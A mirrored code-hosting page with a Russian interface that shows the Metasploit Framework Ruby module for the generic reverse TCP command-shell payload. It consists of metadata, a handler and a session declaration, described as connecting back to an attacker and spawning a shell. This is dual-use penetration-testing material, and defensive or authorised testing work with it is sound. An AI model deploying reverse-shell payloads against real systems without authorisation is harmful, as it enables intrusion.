/
githubmirror
/
metasploit-framework
Обзор
Документация
Войти
/
githubmirror
/
metasploit-framework
Код
Запросы
0
Пакеты
0
Релизы
0
Аналитика
Безопасность
master
modules/payloads/singles/generic/shell_reverse_tcp.rb
25 строк
641 B
bcoles
modules/payloads/singles: Resolve RuboCop violations
19 апр 2025, 19:57
Не верифицирован
19 апр 2025, 19:57
03f4c46
Код
Авторство
О чём код?
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## module MetasploitModule CachedSize = 0 include Msf::Payload::Single include Msf::Payload::Generic def initialize(info = {}) super( merge_info( info, 'Name' => 'Generic Command Shell, Reverse TCP Inline', 'Description' => 'Connect back to attacker and spawn a command shell', 'Author' => 'skape', 'License' => MSF_LICENSE, 'Handler' => Msf::Handler::ReverseTcp, 'Session' => Msf::Sessions::CommandShell ) ) end end